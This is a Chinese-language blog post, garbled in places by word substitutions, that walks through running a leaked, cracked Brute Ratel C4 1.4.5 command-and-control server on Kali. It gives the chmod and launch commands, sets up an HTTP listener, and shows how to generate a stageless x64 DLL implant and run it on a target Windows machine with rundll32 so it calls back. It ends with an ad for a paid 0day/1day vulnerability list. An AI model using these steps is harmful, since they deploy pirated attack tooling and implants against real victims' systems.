前言:
本文提供的BRC4 1.4.5由41group泄露,棉花糖未参与制作,利用此工具需遵遵法律法规,齐备后果由利用者本人负担。
简单利用教程:
以下操作除马子实行外,均在kali完成。
拿到压缩包,放到kali中解压,得到如下文件:
给brute-ratel-linx64_crack以及lib64/commander实行权限
- chmod +x brute-ratel-linx64_crack
- chmod +x lib64/commander
- ./brute-ratel-linx64_crack -ratel -a admin -p password -h 127.0.0.1:50000 -sc cert.pem -sk key.pem
之后打开客户端,在kali图形界面中找到brc4文件夹,实行命令:
- chmod +x Rungui.sh
- ./Rungui.sh
接下来是天生马子并上线,本文只演示一种简单的设置,复杂的设置请自行研究
进入客户端后,点击C4 Profiler -> Add http Listener
按如下图示设置即可
须要注意的地方:listener name为监听名称,可自界说,第二行为选择监听地点,可点击选择你的ip,第三行为重定向地点,可点击右侧same按钮选择与监听地点一致,端口可自界说,URL栏据官方描述可随便乱填,ssl棉花糖个人发起选择no,因为测试中ssl选择yes无法成功上线,sleep和jitter类似于cs的延时时间,可调低,末尾最后一行勾选后,马子假如一次不上线,不会一直请求
设置好后点击save生存,即可得到一个监听器,右键此监听器,选择Stageless,即可天生对应架构的马子,棉花糖演示选择的是 X64 Arch (Default) -> Dll,天生的dll放到目标win中,cmd实行:
- rundll32 .\badger_x64.dll,main
内部福利介绍-更新啦!
近期更新的0day/1day(包含公开和未公开毛病-仅枚举部门)毛病整理更新至9000+
|
